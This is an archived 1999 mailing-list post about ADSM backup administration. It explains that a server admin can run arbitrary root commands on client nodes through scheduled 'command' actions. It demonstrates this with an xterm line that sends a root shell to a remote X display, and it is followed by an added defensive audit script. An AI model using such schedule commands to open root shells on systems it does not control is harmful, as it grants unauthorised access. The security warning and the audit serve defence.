ADSM-L

Re: Plea for ammo-

1999-10-07 21:39:30
Subject: Re: Plea for ammo-
From: "Allen S. Rout" <asr AT NERSP.NERDC.UFL DOT EDU>
Date: Thu, 7 Oct 1999 21:39:30 -0400
=> On Fri, 8 Oct 1999 08:56:18 +1000, Trevor Foley <Trevor.Foley AT BANKERSTRUST.COM DOT AU> said:

> G'day,

> I'll offer the opposite argument.

> I am responsible for the ADSM servers at our site. There are over 200 NT
> servers as ADSM clients, and I don't have, need, or want, admin rights to
> them. The same applies to all of our Unix boxes.
[ ... ]
> Someone needs admin rights on the NT box to set up/support ADSM. But it
> doesn't have to be the ADSM server administrator.


What is not necessarily obvious at first glance is that you, the ADSM admin,
_do_ have administrator rights if

a) the scheduler is running and

b) the scheduler is running as administrator (root/whatever)

through your capacity to perform scheduled actions of type 'command', you can
do just about anything.  Just for giggles, try this some time: Set up a
schedule of type 'command' for one of your UNIX nodes.  Make the 'objects'
field


/usr/bin/hostname > /var/tmp/adsm-foo-blah
(the location of the 'hostname' program could vary on your system)


Now try one with

/usr/openwin/bin/xterm -display yourmachine.your.domain:0
( if you use X, that is )

Wander around that root shell, but DON'T TOUCH ANYTHING.  Unless you already
have root there anyway.


Now go think about security. :)


Allen S. Rout
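
A client-side audit for the exposure described in the message above, as an added example that is not part of the original post. It assumes the SCHEDCMDDISABLED client option found in later Tivoli Storage Manager clients (the successor to ADSM) and that the option name may be abbreviated; the function names, the ps listing and the option files are constructed for illustration.

```shell
#!/bin/sh
# Added example: flags a node where the server admin can run commands as root.
# Function names are hypothetical; sample inputs must be supplied by the caller.

# Exit 0 if the client option file sets SCHEDCMDDISABLED YES.
# Assumption: the name is case-insensitive and may be shortened to SCHEDCMDD.
# The file is treated as a single stanza; the last value seen is kept.
sched_cmd_disabled() {
    awk '
        /^[ \t]*\*/ { next }                  # "*" starts a comment line
        {
            name = tolower($1); val = tolower($2)
            if (length(name) >= 9 && index("schedcmddisabled", name) == 1)
                disabled = (val == "yes")
        }
        END { exit disabled ? 0 : 1 }
    ' "$1"
}

# Reads "user command args..." lines (as from: ps -eo user,args) on stdin and
# prints those where a root-owned dsmc is running in scheduler mode.
root_schedulers() {
    awk '$1 == "root" && $2 ~ /(^|\/)dsmc$/ {
        for (i = 3; i <= NF; i++)
            if (tolower($i) ~ /^sched/) { print; next }
    }'
}

# $1 = saved ps listing, $2 = client option file.
# Prints EXPOSED when both conditions from the message hold (scheduler running,
# and running as root) and server-defined commands are not disabled.
audit_node() {
    if [ -n "$(root_schedulers < "$1")" ] && ! sched_cmd_disabled "$2"; then
        echo EXPOSED
    else
        echo OK
    fi
}
```

On a live node the first argument would be a file captured with `ps -eo user,args` and the second the client system option file, whose location varies by platform.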